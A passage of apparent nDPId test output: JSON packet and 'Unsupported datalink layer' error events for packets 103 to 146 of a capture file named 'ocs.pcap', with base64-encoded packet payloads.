gXS4GsVCXk5mmnv4aGzwiJikmbrrYwSG7gLGMq1Specx4cn7iOy8AFI7DiXzieMuLQiqNn+g7NZUoouIyNwNxS1ooaGRFaOZpp2P63rplm++0PY\/9ufZ5AaBlL9i1UJFDxwe5de4BF05CsjlezUnlBe3\/UC4IESYmFKrt1BPheCKRmwWloxgE8NvJTsgi2doK5caAQFUTc4P"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":103,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652789673} -01250{"packet_event_id":1,"packet_event_name":"packet","packet_id":103,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":737,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":737,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAC4Tl1QABABgbIwKi0ArL40DaPSAG7xozJlTpn8qGAGAHD0xcAAAEBCAoANYPLRwX+x2BiVW9BnSX67CTzo6pQwp1Ief7ups6ymrbkGpP+04rT\/1i2UE4rbM2NWWZQlBk3\/Rfoz4aFxomnQrHp\/wUShf4ThTi2LzGlBOkiTLbxHTuUED\/T5yqQDM3C20gUFSiciJpfG1i6lRbiJ2tBEfn2dPKVzI2ZKM3M+kpQ1R357lW+1p+Z+es6EeDvw4ap2V+DQMB7jtaWckVhVlvXqZVliaGtts46A0baED6jzdtjgptgAsX+Fsx5CJH+tzg8Aw2fBfCi167kZBisjSUjENwdoedP0rnz7DQKyQRNtZNrMSZo91kmx7rDs8Xmxu8ThTe5IuuPJcDp6R970P7UDFf8PwLNEKXgdVJ41ZH09u9C0a7CliaViUgGoO38cZl5XgWD1XyL5BBaZqEHg0iKLnx2NAdutg\/fHIeUsk\/ejlaL+fMyB+w30R9H+dJllm6J53Hti9twv6lpEBEHdY+CnAh5wO7jLQwglQFIsOdwnv0p85h9uX0Rj+x0HCWrOlq6RgSKjFm1xpcmfUGB\/1L1fxshCXpJfUg\/6+ABZHRcQv2PkCbl6ASk7jEkPymkG3DHx+ouE4gqkGjAWws5CFbG6TlSyDorDHTMHpftmj6s8FhmQkCPvyM47iBD6vkI\/0ZvZAyfDCbOKfXrapq2ZM3bMu0pourorzlk6NNxV3w9tfurDDU+TzipbFj+mYj3CcBNUI4M6fwvBcGj1PnD8QHCbDvSAsJT4axtF27bF+vnKqVyngnQ8haNr50zHoHyuL\/hTINOIkdncIxxfn+0\/IeZXaPw\/KSG5huA2b+AfgXNqEi7mMNa\/UQYZJv+Kdd3Yqx9B\/TwitpkgVQ9v+Q7GPBYUWPdKFRU6tU1Vt9+Rdg7nPI5ZdbxmJ1u8QjL8Md1+jHnSUVNh6BIaGk7qcpTW+bhl9Y="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":104,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652789674} 
-00638{"packet_event_id":1,"packet_event_name":"packet","packet_id":104,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":285,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":285,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQABHTl2QABABgiLwKi0ArL40DaPSAG7xozMQjpn8qGAGAHDyz8AAAEBCAoANYPLRwX+xxcDAQDkS8zrxTo+LF1AeQl839\/+9ktqk9uWM8efjq5DeUfVWdv6zLt\/ZfFs0\/zPaXapOV3xskonl\/hLl7UiEtxymNkw+nl1gnr1BwMJP4oxm7hURVQxu8sKRwvtF5A3A96ftz7kvvdabVHKDRVyedDA6Xh9tXcUg6eYmIYQN53lENHb1o9TB4aA\/hDy0DlM9F6xN6EweGVSJiuCttpVHdVh1\/qEWEvp1msk0H0eFtrxPlzT1Yx52GlkELDb4j0r+4GDaGB7D2COoxrVCN3U58rnYCYuB5Nbu1a0lCPpFflNAs4FcvJUaiDC"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":105,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652789674} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":105,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMD1QABABoH0wKi0ArL40DbC2QBQ64tGkd7m1L+AEAIhCU8AAAEBCAoANYPLRwX\/fw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":106,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652789748} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":106,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMD2QABABoHnwKi0ArL40DbC2QBQ64tGkd7m1L+wEAIhW58AAAEBCAoANYPSRwX\/fwEBBQre5tor3ubflw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":107,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652789750} 
-00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":107,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMD3QABABoHmwKi0ArL40DbC2QBQ64tGkd7m1L+wEAIhVjMAAAEBCAoANYPSRwX\/fwEBBQre5tor3ublAw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":108,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652790009} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":108,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANDl3QABABglzwKi0ArL40DaPSAG7xozNKzpn9deAEAHuXPUAAAEBCAoANYPtRwX\/3A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":109,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652790602} -00331{"packet_event_id":1,"packet_event_name":"packet","packet_id":109,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPDy6QABABnybwKi0AomHgzS0VhQCr\/++QwAAAACgAjkI0pgAAAIEBbQEAggKADWEKAAAAAABAwMG"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":110,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652790679} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":110,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMD4QABABoHxwKi0ArL40DbC2QBQ64tGkd7m5QOAEAJP93EAAAEBCAoANYQwRwYAhQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":111,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652790711} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":111,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMD5QABABoHkwKi0ArL40DbC2QBQ64tGkd7m5QOwEAJPHmYAAAEBCAoANYQzRwYAhQEBBQre5u\/b3ub1Rw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":112,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652790713} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":112,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMD6QABABoHjwKi0ArL40DbC2QBQ64tGkd7m5QOwEAJPGPoAAAEBCAoANYQzRwYAhQEBBQre5u\/b3ub6sw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":113,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652790736} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":113,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMD7QABABoHiwKi0ArL40DbC2QBQ64tGkd7m6m+wEAJ8E0gAAAEBCAoANYQ2RwYAmwEBBQre5u\/b3ub6sw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":114,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652790738} 
-00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":114,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMD8QABABoHtwKi0ArL40DbC2QBQ64tGkd7m+rOAEAKp4UsAAAEBCAoANYQ2RwYAmw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":115,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652790740} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":115,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMD9QABABoHgwKi0ArL40DbC2QBQ64tGkd7m+rOwEAKp\/WoAAAEBCAoANYQ2RwYAmwEBBQre5vVH3ub6sw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":116,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652790749} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":116,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMD+QABABoHrwKi0ArL40DbC2QBQ64tGkd7nAB+AEALW27EAAAEBCAoANYQ3RwYAmw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":117,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652790761} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":117,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMD\/QABABoHqwKi0ArL40DbC2QBQ64tGkd7nBYuAEAME1hAAAAEBCAoANYQ4RwYAoQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":118,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652790762} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":118,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEAQABABoHpwKi0ArL40DbC2QBQ64tGkd7nCveAEAMx0HcAAAEBCAoANYQ4RwYAoQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":119,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652790776} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":119,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEBQABABoHowKi0ArL40DbC2QBQ64tGkd7nEGOAEANeytgAAAEBCAoANYQ6RwYApQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":120,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652790797} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":120,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMECQABABoHnwKi0ArL40DbC2QBQ64tGkd7nFc+AEAOLxTwAAAEBCAoANYQ7RwYApw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":121,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652790812} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":121,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEDQABABoHmwKi0ArL40DbC2QBQ64tGkd7nGzuAEAO5v58AAAEBCAoANYQ9RwYAqA=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":122,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652790816} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":122,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEEQABABoHlwKi0ArL40DbC2QBQ64tGkd7nIKeAEAPmugMAAAEBCAoANYQ9RwYAqw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":123,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652790817} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":123,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEFQABABoHkwKi0ArL40DbC2QBQ64tGkd7nJhOAEAQTtGoAAAEBCAoANYQ9RwYAqw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":124,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652790838} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":124,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEGQABABoHjwKi0ArL40DbC2QBQ64tGkd7nK3+AEARArsUAAAEBCAoANYRARwYAtA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":125,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652790845} 
-00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":125,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEHQABABoHiwKi0ArL40DbC2QBQ64tGkd7nMOuAEARuqSsAAAEBCAoANYRARwYAtA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":126,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652790847} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":126,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEIQABABoHhwKi0ArL40DbC2QBQ64tGkd7nNleAEASbo5AAAAEBCAoANYRBRwYAtQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":127,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652790848} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":127,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEJQABABoHgwKi0ArL40DbC2QBQ64tGkd7nO8OAEATInfcAAAEBCAoANYRBRwYAtQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":128,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652790915} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":128,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMEKQABABoHTwKi0ArL40DbC2QBQ64tGkd7nO8OwEATIIkAAAAEBCAoANYRHRwYAtQEBBQre50Ev3udGmw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":129,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652790916} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":129,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMELQABABoHSwKi0ArL40DbC2QBQ64tGkd7nO8OwEATIHNMAAAEBCAoANYRIRwYAtQEBBQre50Ev3udMBw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":130,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652790979} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":130,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMEMQABABoHJwKi0ArL40DbC2QBQ64tGkd7nO8PQEATIlpoAAAEBCAoANYRORwYAtQEBBRLe51Fz3udW397nQS\/e50wH"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":131,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652790985} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":131,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMENQABABoHIwKi0ArL40DbC2QBQ64tGkd7nO8PQEATIkS4AAAEBCAoANYRORwYAtQEBBRLe51Fz3udcS97nQS\/e50wH"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":132,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791008} 
-00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":132,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANDl4QABABglywKi0ArL40DaPSAG7xozNKzpn9fKAEAHuW3wAAAEBCAoANYRRRwYA1g=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":133,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791021} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":133,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMEOQABABoHPwKi0ArL40DbC2QBQ64tGkd7nTAewEAT166YAAAEBCAoANYRSRwYA3gEBBQre51Fz3udcSw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":134,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791049} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":134,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMEPQABABoHOwKi0ArL40DbC2QBQ64tGkd7nTAewEAT15jcAAAEBCAoANYRVRwYA3gEBBQre51Fz3udhtw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":135,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791074} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":135,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEQQABABoHZwKi0ArL40DbC2QBQ64tGkd7nYbeAEAUjd1cAAAEBCAoANYRXRwYA8A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":136,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791080} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":136,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMERQABABoHYwKi0ArL40DbC2QBQ64tGkd7nZyOAEAVQcb0AAAEBCAoANYRYRwYA8A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":137,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791107} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":137,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMESQABABoHXwKi0ArL40DbC2QBQ64tGkd7nbI+AEAV9bBkAAAEBCAoANYRbRwYA+A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":138,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791111} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":138,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMETQABABoHWwKi0ArL40DbC2QBQ64tGkd7ncfuAEAWqZoAAAAEBCAoANYRbRwYA+A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":139,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791112} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":139,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEUQABABoHVwKi0ArL40DbC2QBQ64tGkd7nd2eAEAXYYOYAAAEBCAoANYRbRwYA+A=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":140,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791132} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":140,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEVQABABoHUwKi0ArL40DbC2QBQ64tGkd7nfNOAEAYFW0UAAAEBCAoANYRdRwYA\/g=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":141,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791137} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":141,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEWQABABoHTwKi0ArL40DbC2QBQ64tGkd7ngj+AEAYyVaoAAAEBCAoANYReRwYA\/w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":142,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791138} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":142,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEXQABABoHSwKi0ArL40DbC2QBQ64tGkd7nh6uAEAZfUBEAAAEBCAoANYReRwYA\/w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":143,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791200} 
-00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":143,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEYQABABoHRwKi0ArL40DbC2QBQ64tGkd7njReAEAaNSmwAAAEBCAoANYRkRwYBBA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":144,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791202} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":144,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEZQABABoHQwKi0ArL40DbC2QBQ64tGkd7nkoOAEAa6RNMAAAEBCAoANYRkRwYBBA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":145,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791209} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":145,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMEaQABABoHDwKi0ArL40DbC2QBQ64tGkd7nkoOwEAa6G6EAAAEBCAoANYRkRwYBBAEBBQre55fv3uedWw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":146,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791274} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":146,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMEbQABABoHCwKi0ArL40DbC2QBQ64tGkd7nkoOwEAa6Fi4AAAEBCAoANYRrRwYBBAEBBQre55fv3ueixw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
